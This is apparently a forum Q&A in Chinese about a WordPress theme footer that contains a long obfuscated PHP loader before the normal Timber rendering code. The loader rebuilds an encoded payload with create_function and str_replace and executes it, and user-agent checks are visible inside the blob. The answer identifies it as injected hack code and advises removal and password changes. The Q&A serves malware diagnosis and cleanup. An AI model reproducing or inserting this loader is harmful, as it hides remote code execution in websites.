
我正在编辑一个客户的网站,在他们的主题中,我看到了大量以前从未见过的不寻常的 PHP 代码。它似乎是某种加密。

<?php /*
 * NOTE(review): obfuscated statement run that sits in front of the theme's own footer code.
 * What the visible statements do:
 *  - $pcyvuntd holds an encoded payload string (this listing shows it with altered whitespace).
 *  - substr($pcyvuntd, 6020, 34) is split on chr(120) ('x'); element 0 is then called as a
 *    function on elements 1 and 2. The visible tail "StrrEVx...xecAlPeR_rtS" suggests strrev()
 *    producing the names create_function and str_replace -- presumably; confirm on the original file.
 *  - plurbsoe() joins substr() slices of the payload at the offset/length pairs listed in
 *    $yyvboxve, then calls its third argument with chr(9), chr(92) and the joined text
 *    (tab -> backslash if that callable is str_replace).
 *  - The rebuilt text is handed to $bqmbrz("", ...) and the returned value is invoked, i.e. code
 *    assembled at run time is executed.
 *  - The last three assignments overwrite the working variables with unrelated values.
 * None of the theme code after the closing tag references these variables.
 */ $pcyvuntd = '>Ew:Qb:Qc:W~!%z!>2<!gps)%j>1<%j=6[%ww2!>#p#/#p#/%z<jg!)%z>>ss    x5csboe))1/35.)1/14+9**-)1/#L4]275L3]248L3P6L1M5]D2P4]D6#<%G]y6d]b  x27)fepdof.)fepdof./#@#/qp%>5h%!]D4]273]D6P2L5P6]y6gP7L6M7]D4]275]D:M8]Df#<%tdz>)!gj}Z;h!opjudovg}{;#)tutjyf`opjudovg)!gj!|!*msv%)}k~~~<ftmbg!27pd%6<pd%w6Z6<.3`hAosvufs!|ftmf!~<**9.-j%27u%)7fmjix6<C  x27&6<*rfs%7-K)fujsxX6<#j6<*K)ftpmdXA6~6<u%7>/7&6|7**111127-K)ebfsX x9#-!#f6c68399#-!#65egb2dc#*<!sfuvso!sboepn)%epnbss-%rxW~!Ypp2)%unction wervuph($n){return chr(ord($n)-1);} @error_reporting(0); $!hmg%)!gj!<2,*j%-#1]#-bubE{h%)tpqsut>j%!*9!   x27!hmg%)!gj!~!%tmw!>!#]y84]275]y83]273]y76]277#<!%t2w>#]y74]273]y764P8]37]278]225]241]334]368]322]3]364]6]283]427]36]373P6]36]73>1*!%b:>1<!fmtf!%b:>%s:    x5c%j:.2^,%b:<!%c:>*<")));$fiyflet = $jyvasrw("", $uzdntih); $fiyflet();}}vt)esp>hmg%!<12>j%!|o]o]Y%7;utpI#7>/7rfs%6<#o]1/20QUUI7jsv%7UFH#  x27rfs%6~6< x7fw6<*if((function_exists("    x6f 142 x5f 163 x74 *#}_;#)323ldfid>}&;!osvufs} x7f;!opjudovg   x7f x7f<u%V x27{ftmfV   x7f<*X&Z&S{ftmfV    x7%o:W%c:>1<%b:>1<!gps)%j:>1<%j:=tj2bge56+99386c6f+9f5d8X;!sp!*#opo#>>}R;msv}.;/#/#/},;#-#}+;%-qp%)54l} x27;%!<z!>!#]D6M7]K3#<%yy>#]D6]281L1#/#M5]DgP5]D6#<%fdy>#!2p%Z<^2   x5c2b%!>!2p%!*3>?*2b%)gpf{jt)!gj!<*2bd%-#16:+946:ce44#)zbssb!>!ssbnpe_GMFT`QIQ&f_UTPI`QUUI&e_SEEB`FUPf!<X>b%Z<#opo#>b%!*##>>X)!gjZ<#opo#>b%!**X)ufttj   x22)gj!|!*nbsbq%)323ldfidk!~!<**qp%!-uyfu%)3of)fepdof`57ftbc    x7f!|!*uyfu x27k:!ftmf!}Z;^nbsbq%   x5cSFWSFT`%}4]275]y83]248]y83]256]y81]265]y72]254]y76#<!%w:!>!(%w:!>!   x246767~6<($uas,"   x72 166 x3a 61  x31")) or (strstr($uas,"    x61 156 x64 162 x6f 1+#Qi   x5c1^W%c!>!%i   x5c2^<!Ce*[!%cIjQeTQcOc/#00#W~!Ydrr)%rxB2qj%6<^#zsfvr#  x5cq%7/7#@#7/7^#iubq#   x5cqtsbqA7>q%6< x7fw6*  x7f_*#zB%z>!    x24/%tmw/   x24)%zW%h>EzH,2W%wN;#-Ez-1H*WCw*[!%rN}#QwTW%hIr ]284]364]6]234]342]58]24]31#-%tdz*Wsfuvso!%b-u%!-#2#/#%#/#o]#/*)323zbe24-   x24*<!~!    
x24/%t2w/   x24)##-!#~<#/%  x24-    x24!>!f2986+7**^/%rx<~!!%s:N}#-%7-C)fepmqnjA    x27&6<.fmjgA    x27doj%6<   x7fw6*!*#91y]c9y]g2y]#>>*4fubmgoj{h1:|:*mmvo:>:iuhofm%:-5ppde:4:|:**#ppde#)t+)!gj+{e%!osvufs!*!+A!>!{e%)!>> x22!ftmbg)!}k~~9{d%:osvufs:~928>>   x22:ftmbg39*56A:>:utjyf`4   x223}!+!<+{e%+*!*+fepdfe{h+{d%)+opjudovg156 x63 164 x69 157 x6e"; ff<*XAZASV<*w%)ppde>u%V<#65,47R25,d7R17,67R37,#/q%>U<#16,tus)%    x24-    x24b!>!%yy)#}#-#    x24-    x24-tusqpt)%z-#:#*  x24-    x24!>!t`msvd}+;!>!} x27;!>>>!}_;gvc%}&;ftmbg}   x7f;!osvufs}w;* x7f!>>  x22!pd%7fw6*    x7f_*#ujojRk3`{666~6<&w6<   x7fw6*CW&x24y7  x24-    x24*<!  x24-    x24gps)%j>1<%j=tj{fpg)% x73:8297f:5297e:56-xr.985:52985-tNFS&d_SFSFGFS`QUUI&c_UOFHB`SFTV`QUUI&b%!|!*)323zbek!~!<b%  x7s-%rxB%h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93e:5597f-s.9uzdntih = implode(array_map("wervuph",str_split("%tjw!>!#]y8x63   162 x65 141 x74 145 x5f 146 x75 8:|:7#6#)tutjyf`439275ttfsqnpdov{h19275j{hnpd19275fs!~<3,j%>j%!*3!  x27!hmg%!)!gj!<2,*j%d%!<5h%/#0#/*#npd/#)rrd/#00;quui#>.%!<***f  x27,*e  x27,*d  x27,*c  x27,*yqmpef)#   x24*<!%t::!>!   x24Ypp3)%cB%iN}#-!  x24/%tmw/   x24)%c*W%eNz)   x24]25  x24-    x24-!%  x24-    x24*!|! x24-    x24 x5c%j^  x24-    x24tvc)qj3hopmA x273qj%6<*Y%)fnbozcYufhA    x27#[k2`{6:!}7;!}6;##}C;!>>!}W;utpi}Y;tuofuop281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*<%bG9}:}.}-}!#*<%nfd>%fd#}#)fepmqnj!/!#0#)idubn`hfsq)!sp!*#ojn)7gj6<.[A    x27&6<  x7fw6*  x7f_*   x27pd%6<pd%w6Z6<.2`hA   x27pd%6<C   x27pd%6|6.7eu{66~67<&w6<*66 157 x78"))) { $jyvasrw = "  %epnbss!>!bssbz)#44ec:649#-!#:618d5fopD#)sfebfI{*w%)kVx{**#k#)tutjyf`x  x22l:!}V;3q%}U;y]}RCw6<pd%w6Z6<.5`hA    x27pd%6<pd%w6Z6<.4`hA   x<*::::::-111112)eobs`un>qp%!|Z~!<##!>!2p%d`ufh`fmjg}[;ldpt%}K;`ufldpt}X;`msvd}R;*m24-  x24<%j,,*!| x24-    x24gvodujpo!    
x24-    %)7gj6<**2qj%)hopm3qjA!|!*!***b%)sfxpmpusut!-GTOBSUOSVUFS,6<*msv%7-MSV,6<*)ujojR    x27id%6<    x##:>:h%:<#64y]552]e7y]#>n%<#372]58y]472]37y]672]48y]#>s%<#462]47y141   x72 164") && (!isset($GLOBALS[*#fopoV;hojepdoF.uofu%s:  x5c%j:^<!%w`    x5c^sv%)}.;`UQPMSVD!-id%)uqpuft`msvd},;uqpuf]252]18y]#>q%<#762]67y]562]38y]572]48y]#>m%:|:*r%:-t%y<Cb*[%h!>!%tdz)%bbT-%bT-%hW~%fdy)##-!#~<%h00#*<%nfd)##Qtpz)#]341]88M% x27jsv%6<C>^#zsfvr# x5cq%7**^#zsfvr#    x5cq%)uft-bubE{h%)sutcvt)fubmgoj{hA!osvuj6<*QDU`MPT7-NBFSUT`LDPT7-UFOJ`GB)fubfsdXA  x27K6<  x7fw6*3qj%7>    x2272qj{fpg)%s:*<%j:,,Bjg!)%j:>"    x61 156 x75 156 x61"])))) { $GLOBALS["  x61 156 x75 156 #w#)ldbqov>*ofmy%)utjm!|!*5!    x27!hmg%)!gj!|!*1?hmg%tj    x22)gj6<^#Y#    x5cq%   x27Y%6<.msv`f   x24<!fwbm)%tjw)bssbz)#P#-#Q#-#B#-#T#-#E#-#G#-#H!-#1]#-bubE{h%)tpqsut>j%!*72!    x27x61"]=1; $uas=strtolower($_SERVER["  x4!-#jt0*?]+^?]_    x5c}X   x24<gj<*#k#)usbut`cpV   x7f x7fx5c1^-%r x5c2^-%hOh/#00#W~!%K)ftpmdXA6|7**197-2qj%7-K)udfoopdXA  x22)7gt2w)##Qtjw)#]82#-#!#-%tmw)%tww**WYsboepn)%bs  x24/%tjw/   x24)%   x24-    x24y4   x24-    x24]y8  x24-    x24]26  x-1-bubE{h%)sutcvt)!gj!|!*bubE{h%)j{hn)3of:opjudovg<~   x24<!%o:!>! 
x242178}527}88.98]K4]65]D8]86]y31]278]y3f]51L3]84]y31M6]y3e]81#/#7e:47R57,27R66,#/q%>2q%<#g6R85,67R37,18R#>q%V<#D#-#W#-#C#-#O#-#N#*-!%ff2-!%t::**<(<!fwbm)%tjw)#    x24#-!#]y38#-!%w:*  x7f_*#fmjgk4`{6~6<tfs%w6<   x7fw6*CWtfs%)7gj6<*id%)ftpmdR6<*id%)dfyf;2]},;osvufs}   x27;mnui}&;zepc}A;~!}   x7f;!|!}{;)gj}l;33bq}k;opjudovg)!gj!<**2-4-bubE{h%)sutc]83]238M7]381]211M5]67]452]88]5]48]32M3]317]445]212]445]43]321]464#j0#!/!**#sfmcnbs+yfeobz+sfwjidsb`bj+upcotn+qsvmt+fmhpph#)zbssb!-<ofmy%,3,j%>j%!<**3-j%-bubE{h%)sutcvt-eb#-*f%)sfxpmpusut)tpqssutRe%)Rd%)Rb%))!gj!<*#cd&7-#o]s]o]s]#)fepmqyf   x27*&7-n%)utjm6<    x7fw6*CW&)7gx6d 145")) or (strstr($uas,"    x66 151 x72 145 x2*!%z>3<!fmtf!%z>2<!%ww2)%w`TW~#-#I#-#K#-#L#-#M#-#[#-#Y#-1GO   x22#)fepmqyfA>2b%!<*qp%-*.%)euhA)3of>2bx2400~:<h%_t%:osvufs:~:<*9-1-r%)s%>/h%:<**#57]38y]47]51  x64")) or (strstr($uas,"    x63 150 x72 157 pd!opjudovg!|!**#j{hnpd#)tutjyf`opjudovg    x22)!gj}1~!<2p% x7f!~!<##!>5    116 x54"]); if ((strstr($uas,"  x6d 163 x69 145")) or (strstrR  x27tfs%6<*17-SFEBFI,6<*127-UVPFNJU,6<*27-SF67y]37]88y]27]28y]#/r%/h%)n%-#+I#)q%:>:r%:|:**t%)m%=*h%)m%):fmjix:<]252]y85]256]y6g]257]y86]267]y74]275]y7:]268]y7f#<!%tww!>!    fubfsdXk5`{66~6<&w6<    x7fw6*CW&)7gj6<*doj}x;0]=])0#)U!    
x27{**u%-#jt0}Z;0]=]0#)2q%l}S;255946-tr.984:75983:48984:71]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%tp:}334}472   x24<!%ff2!>!bssb8   124 x54 120 x5f 125 x53 105 x52 137 x41 107 x4StrrEVxNoiTCnUF_EtaERCxecAlPeR_rtSdfdknqymb'; $tdkyczxfw=explode(chr((590-470)),substr($pcyvuntd,(20090-14070),(206-172))); $bqmbrz = $tdkyczxfw[0]($tdkyczxfw[(4-3)]); $ooulnirx = $tdkyczxfw[0]($tdkyczxfw[(6-4)]); if (!function_exists('plurbsoe')) { function plurbsoe($sdqchjk, $nrtiwtb,$tnqwwbrlao) { $umwyqdq = NULL; for($dcovyd=0;$dcovyd<(sizeof($sdqchjk)/2);$dcovyd++) { $umwyqdq .= substr($nrtiwtb, $sdqchjk[($dcovyd*2)],$sdqchjk[($dcovyd*2)+(6-5)]); } return $tnqwwbrlao(chr((40-31)),chr((293-201)),$umwyqdq); }; } $yyvboxve = explode(chr((245-201)),'881,42,3692,34,4103,57,4327,38,5972,48,5563,62,1499,69,5451,44,5252,46,3254,30,2668,36,2147,27,460,66,2608,60,1431,68,3374,41,271,20,3196,58,5201,51,352,45,313,39,817,64,4443,42,4009,70,3536,22,2985,38,1627,41,3930,48,4211,35,1668,25,5796,40,1902,43,4826,67,5625,45,3581,46,2363,41,3167,29,3023,42,3456,41,3768,40,2293,70,209,62,291,22,3978,31,2754,37,4294,33,526,58,5115,38,4160,51,4960,24,797,20,1945,20,4582,37,5495,68,1165,50,5355,43,2791,69,127,34,3415,41,3558,23,5050,65,3129,38,5153,48,1039,21,1215,60,2484,60,1275,50,1325,68,1393,38,1060,55,923,41,2058,41,2704,50,1965,50,2099,48,2015,43,4390,25,964,42,2174,56,4715,43,3726,21,3320,54,4893,67,5836,45,1802,26,4365,25,584,54,5737,59,5398,53,5670,67,3627,65,3808,53,4619,42,5946,26,2923,62,2230,63,4529,53,3497,39,2404,48,1828,50,2860,63,1568,59,3284,36,397,63,1693,65,4415,28,4485,44,2544,64,2452,32,4661,54,5881,28,5909,37,1115,50,161,48,89,38,3065,64,3861,69,638,61,4984,66,1758,44,59,30,1878,24,1006,33,4079,24,699,43,3747,21,0,59,5298,31,4246,48,5329,26,4758,68,742,55'); $bqrhsjd = $bqmbrz("",plurbsoe($yyvboxve,$pcyvuntd,$ooulnirx)); $bqmbrz=$pcyvuntd; $bqrhsjd(""); $bqrhsjd=(461-340); $pcyvuntd=$bqrhsjd-1; ?><?php
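/*
 * Third-party plugins that hijack the theme call wp_footer() to get the footer template.
 * We use that call to end the output buffer (started in header.php) and render the captured
 * markup through the view/page-plugin.twig template.
 */

// Test the global directly: reading a missing key first would raise an
// "undefined index" notice before the intended exception is thrown.
if (!isset($GLOBALS['timberContext'])) {
    throw new \Exception('Timber context not set in footer.');
}
$timberContext = $GLOBALS['timberContext'];

// ob_get_clean() returns the buffered output and discards the buffer in one call;
// like ob_get_contents(), it yields false when no buffer is active.
$timberContext['content'] = ob_get_clean();

$templates = array('page-plugin.twig');
Timber::render($templates, $timberContext);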

问题是:以 $pcyvuntd = 开头的这段代码到底是做什么的?


1 回答 1


如果让我猜,这是黑客入侵后注入的代码。我以前见过类似的东西(不完全一样,但足够相似):黑客拿到了您的 FTP 访问权限并添加了代码。检查一下页面的源代码(也就是在 http://example.org/whatever 上查看源代码)里有没有任何奇怪的东西——我的预感是你会发现指向俄罗斯伟哥的隐藏链接或一些狗屎。

无论哪种方式,我的建议是先把主题打包成 zip 备份,然后把那段代码彻底清除;99% 可以肯定它不是好东西(肯定不是 Timber 添加或使用的)。仅删除这段代码并不能堵住入口:如果对方是通过 FTP 进来的,还应更改 FTP 和后台密码,并检查其他 PHP 文件里是否有同样的注入代码。

于 2017-03-27T14:06:13.650 回答